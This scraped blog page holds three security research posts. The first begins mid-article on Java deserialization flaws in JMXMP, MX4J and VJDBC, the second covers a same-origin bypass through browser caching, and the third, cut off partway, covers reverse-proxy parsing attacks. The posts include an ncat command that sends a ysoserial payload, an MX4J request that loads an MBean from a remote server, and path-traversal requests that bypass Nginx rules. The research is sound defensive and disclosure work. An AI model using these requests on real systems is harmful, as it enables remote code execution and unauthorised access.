which makes it inherently vulnerable to Java deserialization attacks.
However, Oracle introduced the specification JEP-290 (JDK ≥ 8u121, ≥
7u131, ≥ 6u141), which made such attacks much harder.</p>
<p>It turns out that according to the JMX specification (JSR-160), JMX
also supports other transport protocols (called connectors), including
the JMX Messaging Protocol (JMXMP) – a protocol specially created for
JMX. However, this protocol was not included in Java SE and so it never
became popular. One of the main advantages of JMXMP in comparison to RMI
is the fact that JMXMP requires only one TCP port (RMI uses one static
port for the RMI registry and another dynamically chosen port for actual
interaction with a client). This fact makes JMXMP much more convenient
when you need to restrict access using a firewall or when you want to
set up port forwarding.</p>
<p>Despite the fact that libraries implementing JMXMP (<i>jmxremote_optional.jar</i>, <i>opendmk_jmxremote_optional_jar-1.0-b01-ea.jar</i>) have not been updated for at least ten years, JMXMP is still alive and used from time to time. For example, <a href="https://medium.com/cloud-native-the-gathering/remotely-connecting-through-kubernetes-to-a-jmx-agent-in-a-spring-boot-1-x-cf83bb83f499" rel="noopener noreferrer" target="_blank">JMXMP is used in the Kubernetes environment</a> and <a href="https://www.strapdata.com/2019/11/10/elassandra-now-support-jmxmp/" rel="noopener noreferrer" target="_blank">support for JMXMP has recently been added to Elassandra</a>.</p>
<p>The problem with JMXMP is that this protocol completely relies on
Java serialization for data transfer. At the same time, Oracle patches
for JMX/RMI vulnerabilities don’t cover JMXMP, which makes it open to
the Java deserialization attack. To exploit this vulnerability, you
don’t even need to understand the protocol or the format of the data,
just send a serialized payload from <a href="https://github.com/frohoff/ysoserial" rel="noopener noreferrer" target="_blank">ysoserial</a> directly to a JMXMP port:</p>
<pre><code class="hljs nginx"><span class="hljs-title">ncat</span> target.server.com <span class="hljs-number">11099</span> < test.jser
</code></pre>
<p>If you cannot exploit this Java deserialization vulnerability (due to
the lack of gadgets in the application classpath), you still can use
other methods like uploading your MBean or misusing existing MBean
methods. In order to connect to such JMX, you need to download the <a href="https://mvnrepository.com/artifact/org.glassfish.external/opendmk_jmxremote_optional_jar/1.0-b01-ea" rel="noopener noreferrer" target="_blank">necessary package</a>, add it to the classpath, and use the following format to specify the JMX endpoint: <i>service:jmx:jmxmp://target.server.com:port/</i>.</p>
<p>For example:</p>
<pre><code class="hljs ruby">jconsole -<span class="hljs-constant">J</span>-<span class="hljs-constant">Djava</span>.<span class="hljs-keyword">class</span>.path=<span class="hljs-string">"%JAVA_HOME%/lib/jconsole.jar"</span>;<span class="hljs-string">"%JAVA_HOME%/lib/opendmk_jmxremote_optional_jar-1.0-b01-ea.jar"</span> <span class="hljs-symbol">service:</span><span class="hljs-symbol">jmx:</span><span class="hljs-symbol">jmxmp:</span>/<span class="hljs-regexp">/target.server.com:port/</span>
</code></pre>
<p>You can also use <a href="https://github.com/mogwailabs/mjet" rel="noopener noreferrer" target="_blank">MJET</a> but it <a href="https://stackoverflow.com/questions/5510939/jython-jmxmp-protocol-support/57377052#57377052" rel="noopener noreferrer" target="_blank">requires similar changes to the code</a>.</p>
<h2>MX4J</h2>
<p><a href="http://mx4j.sourceforge.net/" rel="noopener noreferrer" target="_blank">MX4J</a>
is an open-source implementation of JMX. It also provides an HTTP
adapter that exposes JMX through HTTP (it works as a servlet). The
problem with MX4J is that by default it doesn’t provide authentication.
To exploit it, we can deploy a custom MBean using MLet (upload and
execute the code). To upload the payload, you can use <a href="https://github.com/mogwailabs/mjet" rel="noopener noreferrer" target="_blank">MJET</a>. To force MX4J to get the MBean, you need to send a GET request to:</p>
<pre><code class="hljs bash">/invoke?objectname=DefaultDomain:<span class="hljs-built_in">type</span>=MLet&operation=getMBeansFromURL&<span class="hljs-built_in">type</span>0=java.lang.String&value0=http://yourserver/with/mlet
</code></pre>
<p>MX4J has not been updated for 15 years, but it is used by such software as <a href="https://en.wikipedia.org/wiki/Apache_Cassandra" rel="noopener noreferrer" target="_blank">Cassandra</a>
(in a non-default configuration). Your “homework” now is to look deeper
into it and search for vulnerabilities. Note the use of hessian and
burlap protocols as JMX-connectors, which are also vulnerable to
deserialization attacks in a default configuration.</p>
<h2>VJDBC</h2>
<p><a href="http://vjdbc.sourceforge.net/" rel="noopener noreferrer" target="_blank">Virtual JDBC</a>
is an old library that provides access to a database using JDBC via
other protocols (HTTP, RMI). In the case of HTTP, it provides a servlet,
which you can use to send a special HTTP request that includes an SQL
query and receive a result from a DB used by the web application.
Unfortunately, VJDBC also uses Java serialization (via HTTP) to interact
with the servlet.</p>
<p>If you use Google to search for this term, you will find that almost
every search result is related to SAP Hybris. SAP Hybris is a major
eCommerce/CRM platform used by many large enterprises. By default, SAP
Hybris exposes the <i>vjdbc-servlet</i> that is vulnerable to an RCE caused by Java deserialization – <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-0344" rel="noopener noreferrer" target="_blank">CVE-2019-0344</a> (and which had other <a href="https://erpscan.io/advisories/erpscan-16-040-sap-hybris-e-commerce-suite-virtualjdbc-sql-injection/" rel="noopener noreferrer" target="_blank">serious security issues</a> in the past as well). A test for this vulnerability was added to Acunetix in <a href="https://www.acunetix.com/blog/releases/new-build-scan-latest-vulnerabilities-ad-blocking-session-headers-new-vulnerability-checks/" rel="noopener noreferrer" target="_blank">September 2019</a>.
Unfortunately, it looks like SAP fixed only their internal version of
VJDBC, and therefore all other software that depends on this library is
vulnerable and its creators are probably unaware of the problem.</p>
<h2>No Way Out</h2>
<p>I was unable to report vulnerabilities in these libraries. For
example, in the case of JMXMP, Oracle doesn’t support JDMK anymore at
all. The only thing I could do is send reports directly to big projects
that use these vulnerable libraries. I also wanted to use this article
to increase awareness so please share it if you believe any of your
colleagues might be using these libraries.</p>
<p>If you still rely on these libraries, try to find a safe alternative.
If it’s impossible, restrict access to them and/or use process-level
filters described in <a href="https://openjdk.java.net/jeps/290" rel="noopener noreferrer" target="_blank">JEP-290</a>
to protect against deserialization and/or put the application in a
sandbox. Also, since these are open-source libraries, you can patch them
manually.</p>
<p>Also, whenever you’re planning to use a package/library, make sure
that it’s still supported and that there are still maintainers. In all
the above cases, if maintainers still supported these projects, they
could easily find and fix such vulnerabilities.</p>
<p>It would also be great if in the future Java and other languages
would get a centralized method for reporting vulnerabilities in public
packages/libraries, similar to the excellent <a href="https://hackerone.com/nodejs-ecosystem" rel="noopener noreferrer" target="_blank">central reporting system for Node.js</a>.</p>Aleksei Tiurinhttp://www.blogger.com/profile/12130898511014099572noreply@blogger.com0tag:blogger.com,1999:blog-8095956197947792822.post-66432383811442834732019-04-30T14:49:00.001-07:002022-08-23T02:40:47.196-07:00Bypassing SOP Using the Browser Cache<div dir="ltr" style="text-align: left;" trbidi="on">
<i>(It's a repost from <a href="https://www.acunetix.com/blog/web-security-zone/bypassing-sop-using-the-browser-cache/">https://www.acunetix.com/blog/web-security-zone/bypassing-sop-using-the-browser-cache/</a>)</i><br />
<br />
Misconfigured caching can lead to various vulnerabilities. For example, attackers may use <a href="http://agrrrdog.blogspot.com/2019/06/a-fresh-look-on-reverse-proxy-related.html">badly-configured intermediate servers (reverse proxies, load balancers, or cache proxies) to gain access to sensitive data</a>. Another way to exploit caching is through Web Cache Poisoning attacks.<br />
<br />
The browser cache may look like a very safe place to temporarily
store private information. The primary risk is that an attacker may gain
access to it through the file system, which is usually considered a
low-hazard vulnerability. However, in some cases, misconfigured
cache-related headers may cause more serious security issues.<br />
<br />
<h2>
Cross-Domain Interaction Risks</h2>
Some websites have several subdomains and need to share data between
them. This is normally not possible due to the same-origin policy (SOP).
There are some methods that enable such cross-domain interaction, for
example, JSONP (JSON with Padding). Developers who use such methods must
implement some kind of protection against data leaking to other sites.<br />
<br />
Let’s say that an example site has two subdomains: <i>blog.example.com</i> and <i>account.example.com</i>. The <i>account.example.com</i>
site has a JSONP endpoint that returns sensitive user data on the basis
of the user cookie. To prevent leaks, this endpoint verifies the <code>Referer</code> header against a whitelist that includes <i>blog.example.com</i>.<br />
<br />
With this setup, if the user is lured to visit a malicious site, the
attacker cannot directly steal sensitive data. However, if the JSONP
endpoint sets cache-related headers, the attacker may be able to access
private information from the browser cache.<br />
<br />
<h2>
Browser Behavior</h2>
Browsers have slightly different cache implementations but <a href="https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html" rel="noopener noreferrer" target="_blank">certain aspects are similar</a>.
First of all, only GET responses may be cached. When the browser gets
the response to its GET request, it checks response headers for caching
information:<br />
<ul>
<li>If the response contains a <code>Cache-Control: private</code> or <code>Cache-Control: public</code> header, the response is cached for <code>Cache-Control: max-age=<seconds></code>.</li>
<li>If the response contains an <code>Expires</code> header, the response is cached according to its value (this header has less priority than <code>Cache-Control</code>)</li>
<li>If none of these headers is present, some browsers may check the <code>Last-Modified</code> header and typically cache the response for ten percent of the difference between the current date and the <code>Last-Modified</code> date.</li>
<li>If there are no cache-related headers at all, the browser may cache the response but usually revalidates it before using it.</li>
</ul>
Problems may arise due to the fact that there is just one browser
cache for all websites and it uses only one key to identify data: a
normalized absolute URI (<i>scheme://host:port/path?query</i>). It
means that the browser cache has no additional information about the
request that initiated a particular response (for example, the
site/origin from which it came, the JavaScript function or tag that
initiated it, the associated cookies or headers, etc.). Any site gets
the cached response from <i>account.example.com</i> as long as it initiates a GET request to the same URI.<br />
<br />
<h2>
The Anatomy of the Attack</h2>
The following is a step-by-step explanation of how this vulnerability is used for an attack:<br />
<ol>
<li>The user visits <i>blog.example.com</i>.</li>
<li>A script on blog.example.com needs user account information.</li>
<li>The user’s browser sends a request to the JSONP endpoint at <i>account.example.com</i>.</li>
<li>The response from the JSONP endpoint at <i>account.example.com</i> contains cache-related headers.</li>
<li>The user’s browser caches the response content.</li>
<li>The user is lured to a malicious site</li>
<li>The malicious site contains a script that points to the JSONP endpoint at <i>account.example.com</i>.</li>
<li>The browser returns the cached response to the script at the malicious site.</li>
</ol>
In this situation, the <code>Referer</code> header is never checked
because the response comes from the cache. Therefore, the attacker gains
access to cached private information.<br />
<br /><img alt="" class="alignnone size-full wp-image-18774" height="392" src="https://cdn.acunetix.com/wp_content/uploads/2019/04/sop-bypass.png" width="779" /><br />
<br />
<h2>
Similar Vulnerabilities</h2>
The same approach may be used to exploit other variations of
Cross-Site Script Inclusion (XSSI) and other SOP Bypass attacks. Such
attacks may bypass other server-side checks, for example, the <code>Origin</code> header, the <code>SameSite</code> cookie attribute, or custom headers.<br />
<br />
Let us assume that <i>account.example.com</i> uses Cross-Origin Resource Sharing (CORS) instead of the JSONP endpoint. It returns an <code>Access-Control-Allow-Origin: *</code> header but uses a special token from a custom header to authenticate the user and protect sensitive data.<br />
<br />
If responses are cached, the attacker may steal private information
by making a request to the same URI. There is no CORS protection (due to
<code>Access-Control-Allow-Origin: *</code>) and the user’s browser will return cached data without checking for the custom header token.<br />
You can see how these vulnerabilities work in practice by analyzing the outputs of the browser console at a <a href="http://account.dbggl.pw/" rel="noopener noreferrer" target="_blank">dedicated test site</a>.<br />
<br />
<h2>
How To Protect Against SOP Bypass</h2>
The described SOP bypass vulnerability is caused by misconfiguration.
In the case of cross-origin interactions, you should disable the
browser cache. Most frameworks and ready-made scripts either don’t set
cache-related headers or set them correctly by default (<code>Cache-Control: no-store</code>). However, you should always double check these headers to be secure.<br />
<br />
Browser vendors are now considering or implementing a stricter
approach to caching. Hopefully, this change will prevent such
cross-origin leaks.<br />
<br />
<i>The tricks invented for the purposes of this article were inspired by the HTTP Cache Cross-Site Leaks article by Eduardo Vela.</i> <br />
<div class="SnapLinksContainer" style="display: none; margin-left: 0px; margin-top: 0px;">
<div class="SL_SelectionRect">
<div class="SL_SelectionLabel">
</div>
</div>
<svg class="SnapLinksHighlighter" xmlns="http://www.w3.org/2000/svg">
<rect height="0" width="0"></rect> <!--Used for easily cloning the properly namespaced rect-->
</svg></div>
</div>
Aleksei Tiurinhttp://www.blogger.com/profile/12130898511014099572noreply@blogger.com0tag:blogger.com,1999:blog-8095956197947792822.post-62453865739668660412019-01-22T14:31:00.000-08:002019-10-16T14:50:11.624-07:00A Fresh Look On Reverse Proxy Related Attacks<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="tr_bq">
<i>(It's a repost from <a href="https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/">https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/</a> )</i></div>
<br />
In recent years, several researches have been published about attacks
deliberately or directly related to reverse proxies. While implementing
various reverse-proxy checks on the scanner, I started analyzing
implementations of reverse proxies.<br />
<br />
Initially, I wanted to analyze how both reverse proxies and web
servers parse requests, find out inconsistencies in the process between
them and use this knowledge for some kind of bypasses. Unfortunately, I
was stuck with analyzing web servers and application servers due to too
many possible variations. For example, Apache web server behaves
differently depending on how you connect it with PHP. Also, an
implementation of a web application, framework or middleware used by a
web application can influence the requests parsing process as well. In
the end I realized that some attacks are still little-known or
completely unknown.<br />
<br />
The goal of this research is to portray the bigger picture of
potential attacks on a reverse proxy or the backend servers behind it.
In the main part of the article, I will show some examples of vulnerable
configurations and exploitation of attacks on various reverse proxies,
but the second goal of the research is to share the raw data about <a href="https://github.com/GrrrDog/weird_proxies" rel="noopener" target="_blank">various implementations of reverse proxies</a> so you can find your ways/tricks (depending on a backend server in each specific situation).<br />
<br />
<h2 style="text-align: left;">
Terms</h2>
Actually, the research is not only about reverse proxies, but also about
load balancers, cache proxies, WAFs and other intermediate servers
between a user and web application which parses and forwards requests.
However I haven’t found a good term which correctly describes such a
server and is well-known in the community, so I will use “reverse proxy”
even when I talk about load balancers or cache proxy. I will call a web
application behind a reverse proxy a back-end server. Be aware that a
backend server is so-called an origin server (this will make sense when
we start talking about caching).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtU7qaAOyF293bmRGJMF0snRtSbIEWv0YF9vuL3cH-ecKw4ABHhLwr73Vn0V2rERXt6qFoof3KChD45NPdwQAFWPYpyz2NrsFLlnbJwjFEGHaWL2KohRTmjF3PM_Q7yYxLwvK4xPekNu2U/s1600/rp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="159" data-original-width="811" height="77" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtU7qaAOyF293bmRGJMF0snRtSbIEWv0YF9vuL3cH-ecKw4ABHhLwr73Vn0V2rERXt6qFoof3KChD45NPdwQAFWPYpyz2NrsFLlnbJwjFEGHaWL2KohRTmjF3PM_Q7yYxLwvK4xPekNu2U/s400/rp.png" width="400" /></a></div>
<h2>
</h2>
<h2>
What is reverse proxy?</h2>
<h3>
</h3>
<h3>
How proxies work</h3>
The basic idea of a reverse proxy is quite simple. It’s an
intermediate server between a user and a back-end server. The purpose of
it can be quite different: it can route requests depending on the URL
to various backends or it can just be there “to protect” against some
attacks or simply to analyze traffic. The implementations can be
different too, but the main sequence of steps is quite the same.<br />
A reverse proxy must receive a request, it must process it, perform some action on it and forward to a backend.<br />
<br />
<h4>
<span style="font-weight: normal;">Processing of a request consists of several main steps:</span></h4>
<h4>
<span style="font-weight: normal;"> </span></h4>
<b>A) 1. Parsing</b><br />
When a reverse proxy receives a request, it must parse it: to get a
verb, a path, a HTTP version, host header and other headers and body.<br />
<blockquote class="tr_bq">
<pre><code class=" hljs http"><span class="hljs-request">GET <span class="hljs-string">/path</span> HTTP/1.1</span>
<span class="hljs-attribute">Host</span>: <span class="hljs-string">example.com</span>
<span class="hljs-attribute">Header</span>: <span class="hljs-string">something</span></code></pre>
</blockquote>
Everything may look quite simple, but if you dive into details, you will see implementations are different.<br />
<br />
Some examples:<br />
<br />
– If a reverse supports Absolute-URI, how will it parse it? Does Absolute-URI have a higher priority than Host header?:<br />
<blockquote class="tr_bq">
<pre><code class=" hljs http"><span class="hljs-request">GET <span class="hljs-string">http://other_host_header/path</span> HTTP/1.1</span>
<span class="hljs-attribute">Host</span>: <span class="hljs-string">example.com</span></code></pre>
</blockquote>
– URL consists of <code>scheme:[//authority]path[?query][#fragment]</code>, and browsers don’t send <code>#fragment</code>. But how must a reverse proxy handle <code>#fragment</code>?<br />
<br />
Nginx throws fragment off, Apache returns a 400 error (due to <code>#</code> in the path), some others handle it as a usual symbol.<br />
<br />
– How does it handle symbols which must be URL-encoded?<br />
<blockquote class="tr_bq">
<pre><code class=" hljs http"><span class="hljs-request">GET <span class="hljs-string">/index.php[0x01].jsp</span> HTTP/1.1</span></code></pre>
</blockquote>
<b>2. URL decoding</b><br />
Due to standards, symbols with a special meaning in the URL must be URL-encoded (<code>%-encoding</code>), like the double quote (<code>"</code>) or “greater than” sign (<code>></code>).
But practically, any symbol can be URL-encoded and sent in a path part.
Many web servers perform URL-decoding while processing a request, so
next requests will be treated in the same way by them.<br />
<blockquote class="tr_bq">
<pre><code class=" hljs http"><span class="hljs-request">GET <span class="hljs-string">/index.php</span> HTTP/1.1</span></code></pre>
</blockquote>
<blockquote class="tr_bq">
<pre><code class=" hljs perl">GET <span class="hljs-variable">%2f</span><span class="hljs-variable">%69</span><span class="hljs-variable">%6e</span><span class="hljs-variable">%64</span><span class="hljs-variable">%65</span><span class="hljs-variable">%78</span><span class="hljs-variable">%2e</span><span class="hljs-variable">%70</span><span class="hljs-variable">%68</span><span class="hljs-variable">%70</span> HTTP/<span class="hljs-number">1.1</span></code></pre>
</blockquote>
<b>3. Path normalization</b><br />
Many web servers support path normalization. Main cases are well-known: <b></b><br />
<blockquote class="tr_bq">
<pre><code class=" hljs ruby"><span class="hljs-prompt">/long/../path/here -></span> /path/here
<span class="hljs-prompt">/long/./path/here -></span> /long/path/here</code></pre>
</blockquote>
But what about <code>/..</code>? For Apache, it’s an equivalent of <code>/../</code>, but for Nginx it means nothing.<br />
<blockquote class="tr_bq">
<pre><code class=" hljs ruby"><span class="hljs-prompt">/long/path/here/.. -></span> /long/path/ - <span class="hljs-constant">Apache</span>
<span class="hljs-prompt">/long/path/here/.. -></span> /long/path/here/.. - <span class="hljs-constant">Nginx</span></code></pre>
</blockquote>
The same with <code>//</code> (“empty” directory). Nginx converts it to just one slash <code>/</code>, but, if it’s not the first slash, Apache treats it as a directory.<br />
<blockquote class="tr_bq">
<pre><code class=" hljs ruby"><span class="hljs-prompt">//long//path//here -></span> /long/path/here - <span class="hljs-constant">Nginx</span>
<span class="hljs-prompt">//long/path/here -></span> /long/path/here - <span class="hljs-constant">Apache</span>
<span class="hljs-prompt">/long//path/here -></span> /long/<span class="hljs-regexp">/path/here</span> - <span class="hljs-constant">Apache</span></code></pre>
</blockquote>
Here are some additional (weird) features which are supported by some web servers. For example: support of path parameters – <code>/..;/</code> is valid for Tomcat and Jetty or traversal with backslash (<code>\..\</code>).<br />
<br />
<h4>
B) Applying rules and performing actions on a request</h4>
Once a request is processed, the reverse proxy can perform some
actions on the request due to its configuration. Important to note that
in many cases, rules of a reverse proxy are path (location) based. If
the path is <code>pathA</code>, do one thing, if <code>pathB</code> – do another.<br />
<br />
Depending on the implementation or on the configuration, a reverse
proxy applies rules based on a processed (parsed, URL-decoded,
normalized) path or on an unprocessed path (rare case). It’s also
important for us to note if it is case-sensitive or not. For example,
will the next paths be treated equally by a reverse proxy?:<br />
<blockquote class="tr_bq">
<pre><code class=" hljs ruby">/path1/ == <span class="hljs-regexp">/Path1/</span> == <span class="hljs-regexp">/p%61th1/</span> == <span class="hljs-regexp">/lala/</span>../path1/</code></pre>
</blockquote>
<br />
<h4>
C) Forwarding to a back-end</h4>
The reverse proxy has processed a request, found appropriate rules
for it and performed necessary actions. Now it must send (forward) it to
a backend. Will it send the processed request or initial request?
Obviously, if it has modified the request, then it sends the modified
version, but in this case, it must perform all the necessary steps, for
example, to perform URL-encoding of special symbols. But what if the
reverse proxy just forwards all requests to only one backend, maybe
forwarding the initial request is a good idea?<br />
<br />
As you can see all these steps are quite obvious and there are not so
many variations. Still, there are differences in implementations, which
we, as attackers, can use for our goals.<br />
<br />
Therefore, the idea of all attacks described below is that a reverse
proxy processes a request, finds and applies rules and forwards it to a
backend. If we find an inconsistency between the way a reverse proxy
processes a request and the way a backend server processes it, we are
then able to create such a request(path) which is interpreted like one
path by the reverse proxy and a completely different path by the
backend. So, we will be able to bypass or to forcefully apply some rules
of the reverse proxy.<br />
<br />
<h3 style="text-align: left;">
Here are some examples</h3>
<h3>
Nginx</h3>
Nginx is a well-known web server, but is also very popular as a
reverse proxy. Nginx supports Absolute-URI with an arbitrary scheme and
higher priority than a Host header. Nginx parses, URL-decodes and
normalizes a request path. Then it applies location-based rules
depending on the processed path.<br />
<br />
But it looks like Nginx has two main behaviors and each of them has its own interesting features:<br />
<br />
- With trailing slash
<br />
<blockquote class="tr_bq">
<pre><code class=" hljs nginx"><span class="hljs-title">location</span> / {
<span class="hljs-title"> proxy_pass</span> <span class="hljs-url">http://backend_server/</span>;
}</code></pre>
</blockquote>
In this configuration, <a href="https://www.acunetix.com/blog/articles/how-to-clean-a-hacked-installation-of-nginx/">Nginx</a>
forwards all requests to the `backend_server`. It sends the processed
request to the backend, meaning that Nginx must URL-encode the necessary
symbols. The interesting thing for an attacker is that Nginx doesn’t
encode all the symbols which browsers usually do. For example, it
doesn’t URL-encode <code>' " < ></code>.<br />
<br />
Even if there is a web application (back-end server) which takes a
parameter from a path and which is vulnerable to XSS, an attacker cannot
exploit it, because modern browsers (except dirty tricks with IE)
URL-encode these symbols. But if there is Nginx as a reverse proxy, an
attacker can force a user to send a URL-encoded XSS payload in the path.
The Nginx decodes it and sends the decoded version to the backend
server, which makes exploitation of <a href="https://www.acunetix.com/websitesecurity/xss/">XSS</a> possible.<br />
<blockquote class="tr_bq">
<pre><code class=" hljs ruby"><span class="hljs-prompt">Browser -></span> <span class="hljs-symbol">http:</span>/<span class="hljs-regexp">/victim.com/path</span><span class="hljs-regexp">/%3C%22xss_here%22%3E/</span> -> <span class="hljs-constant">Nginx</span> -> <span class="hljs-symbol">http:</span>/<span class="hljs-regexp">/backend_server/path</span><span class="hljs-regexp">/<"xss_here">/</span> -> <span class="hljs-constant">WebApp</span></code></pre>
</blockquote>
- Without trailing slash
<br />
<blockquote class="tr_bq">
<pre><code class=" hljs nginx"><span class="hljs-title">location</span> / {
<span class="hljs-title"> proxy_pass</span> <span class="hljs-url">http://backend_server</span>;
}</code></pre>
</blockquote>
The only difference between this config and the previous one is the
lack of the trailing slash. Although seemingly insignificant, it forces
Nginx to forward an unprocessed request to the backend. So if you send <code>/any_path/../to_%61pp#/path2</code>, after processing of the request, Nginx will try to find a rule for `<code>/to_app</code>`, but it will send <code>/any_path/../to_%61pp#/path2</code> to the backend. Such behavior is useful to find inconsistencies.<br />
<br />
<h3>
Haproxy</h3>
Haproxy is a load balancer (with HTTP support). It doesn’t make much
sense to compare it to Nginx, but it will give you an idea of a
different approach.<br />
<br />
Haproxy makes minimal processing of a request. So there is no “real”
parsing, URL-decoding, normalization. It doesn’t support Absolute-URI
either.<br />
<br />
Therefore, it takes everything (with few exceptions) between a verb and HTTP version (<code>GET !i<@>?lala=#anything HTTP/1.1</code>)
and, after applying rules, forwards it to a backend server. However it
supports path-based rules and allows it to modify requests and
responses.<br />
<br />
<h3>
How proxies are used</h3>
While I was working on this research, analyzing various
configurations of reverse proxies, I came to the conclusion that we can
both bypass and apply rules of a reverse proxy. Therefore, to understand
the real potential of reverse proxy related attacks, we must have a
look at their abilities.<br />
<br />
First of all, a reverse proxy has access to both a request and a
response (including those which it sends/receives from a backend
server). Secondly, we need a good understanding of all the features
which a reverse proxy supports and how people configure them.<br />
<br />
How can a reverse proxy handle a request?:<br />
<ol>
<li>Routing to endpoint. It means that a reverse proxy receives a request on one path (<code>/app1/</code>), but forwards the request to a completely different one (<code>/any/path/app2/</code>) on a backend. Or it forwards the request to a specific backend depending on a Host header value. </li>
<li>Rewriting path/query. This is similar to the previous one, but usually involves different internal mechanisms (<code>regexp</code>)</li>
<li>Denying access. When a reverse proxy blocks a request to a certain path.</li>
<li>Headers modification. In some cases, a reverse proxy may add or
change headers of the request. It could be a cool feature for an
attacker, but it’s hard to exploit with a black box approach.</li>
</ol>
How can a reverse proxy handle a response?:<br />
<ol>
<li>Cache. Many reverse proxies support caching of response.</li>
<li>Headers modification. Sometimes a reverse proxy adds or modifies
response headers (even security related), because it cannot be done on a
backend server</li>
<li>Body modification. Reverse proxies will sometimes modify the body too. <a href="https://en.wikipedia.org/wiki/Edge_Side_Includes">Edge Side Includes (ESI)</a> is an example of when this can happen.</li>
</ol>
All this is important for to see more potential attacks, but also
understand that in many cases we don’t need to bypass, but apply rules.
Which leads to a new type of attacks on reverse proxies – proxy rules
misusing.<br />
<br />
<h2>
Server-Side attacks</h2>
<h3>
Bypassing restriction</h3>
The most well known case about reverse proxy related attacks.<br />
<br />
When someone restricts access (3. Denying access), an attacker needs to bypass it.<br />
<br />
<b>Here is an example.</b><br />
Let’s imagine that there are Nginx as a reverse-proxy and Weblogic as a
backend server. Nginx blocks access to an administrative interface of
Weblogic (everything that starts with <code>/console/</code>).<br />
Configuration:<br />
<br />
<blockquote class="tr_bq">
<pre><code class=" hljs nginx"><span class="hljs-title">location</span> /console/ {
<span class="hljs-title"> deny</span> all;
<span class="hljs-title"> return</span> <span class="hljs-number">403</span>;
}<span class="hljs-title"> </span></code></pre>
</blockquote>
<blockquote class="tr_bq">
<pre><code class=" hljs nginx"><span class="hljs-title">location</span> / {
<span class="hljs-title"> proxy_pass</span> <span class="hljs-url">http://weblogic</span>;
}</code></pre>
</blockquote>
As you can see, <code>proxy_pass</code> here is without trailing
slash, which means that a request is forwarded unprocessed. Another
important thing to bypass the restriction is that Weblogic treats # as
a usual symbol. Therefore, an attacker can access the administrative
interface of Weblogic by sending such a request:<br />
<blockquote class="tr_bq">
<pre><code class=" hljs http"><span class="hljs-request">GET <span class="hljs-string">/#/../console/</span> HTTP/1.1</span></code></pre>
</blockquote>
When Nginx starts processing the request, it throws off everything after <code>#</code>, so it skips the <code>/console/</code> rule. It then forwards the same unprocessed path (<code>/#/../console/</code>) to the Weblogic, the Weblogic processes the path and after path normalization, we are left with<code>/console/</code>.<br />
<br />
<h3>
Request Misrouting</h3>
It’s about “1. Routing to endpoint” and, in some cases, “2. Rewriting path/query”.<br />
When a reverse proxy forwards requests only to one endpoint, it can make
an illusion that an attacker cannot reach other endpoints on a backend
or that it cannot reach a completely different backend. <br />
<br />
<b>Example 1.</b><br />
Let’s have a look at similar combinations: Nginx+Weblogic. In this case,
Nginx proxies requests only to a certain endpoint of Weblogic (<code>http://weblogic/to_app</code>). So only requests, which come to a path <code>/to_app</code> on Nginx, are forwarded to the same path on Weblogic. In this situation, it may look like Weblogic’s administrative interface (<code>console</code>) or other paths are not accessible for an attacker.<br />
<blockquote class="tr_bq">
<pre><code class=" hljs nginx"><span class="hljs-title">location</span> /to_app {
<span class="hljs-title"> proxy_pass</span> <span class="hljs-url">http://weblogic</span>;
}</code></pre>
</blockquote>
In order to misroute requests to other paths, we need to know two things again. Firstly, the same as in the example above – <code>proxy_pass</code> is without a trailing slash.<br />
<br />
Secondly, Weblogic supports “path parameters” (<a href="https://tools.ietf.org/html/rfc3986#section-3.3">https://tools.ietf.org/html/rfc3986#section-3.3</a>). For example, <code>/path/to/app/here;param1=val1</code>, and <code>param1</code> will be accessible in a web app through API.<br />
<br />
I think many are aware about this feature (especially after the <a href="https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf" rel="noopener" target="_blank">Orange Tsai’s presentation from BlackHat</a> in the context of Tomcat. Tomcat allows to perform really “weird” traversals like <code>/..;/..;/</code>. But Weblogic treats path parameters differently, as it treats everything after the first <code>;</code> as a path parameter. Does it mean that this feature is useless for an attacker?<br />
<br />
Nope. Let’s have a look at this “magic” which allows accessing any path on Weblogic in this configuration.<br />
<blockquote class="tr_bq">
<pre><code class=" hljs http"><span class="hljs-request">GET <span class="hljs-string">/any_path_on_weblogic;/../to_app</span> HTTP/1.1</span></code></pre>
</blockquote>
<div style="text-align: left;">
When Nginx receives such a request, it normalizes the path. From <code>/any_path_on_weblogic;/../to_app</code> it gets <code>/to_app</code> which successfully applied to the rule. But Nginx forwards <code>/any_path_on_weblogic;/../to_app</code> and Weblogic, during parsing, treats everything after <code>;</code> as a path parameter, so Weblogic sees <code>/any_path_on_weblogic</code>. If it’s necessary, an attacker can go “deeper” by increasing the amount of <code>/../ <span style="font-family: "georgia" , "times new roman" , serif;">after </span>;</code>.</div>
<div style="text-align: left;">
<br /></div>
<b>Example 2.</b><br />
This one is about a “bug” of Nginx. But this “bug” is just a consequence of how Nginx works (so will not be fixed)<br />
<br />
A rule <code>location /to_app</code> means that all paths which start with <code>/to_app</code> (prefix) fall under the rule. So, <code>/to_app</code>, <code>/to_app/</code>, <code>/to_app_anything</code> (including special symbols) fall under it. Also, everything after this prefix(<code>/to_app</code>) will be taken and then concatenated with value in <code>proxy_pass</code>.<br />
Look at the next config. Nginx, after processing<code> /to_app_anything</code>, will forward the request to <code>http://server/any_path/_anything</code><br />
<blockquote class="tr_bq">
<pre><code class=" hljs nginx"><span class="hljs-title">location</span> /to_app {
<span class="hljs-title"> proxy_pass</span> <span class="hljs-url">http://server/any_path/</span>;
}</code></pre>
</blockquote>
If we put both features together, we will see that we can go to any
path one level higher on almost any backend. We just need to send:<br />
<blockquote class="tr_bq">
<pre><code class=" hljs http"><span class="hljs-request">GET <span class="hljs-string">/to_app../other_path</span> HTTP/1.1</span></code></pre>
</blockquote>
Nginx applies <code>/to_app</code> rule, gets everything(<code>../other_path</code>) after the prefix, concatenates it with a value from <code>proxy_pass</code>, so it forwards <code>http://server/any_path/../other_path</code> to a backend. If the backend normalizes the path, we can reach a completely different endpoint.<br />
<br />
Actually, this trick is similar to a well-known alias trick. However,
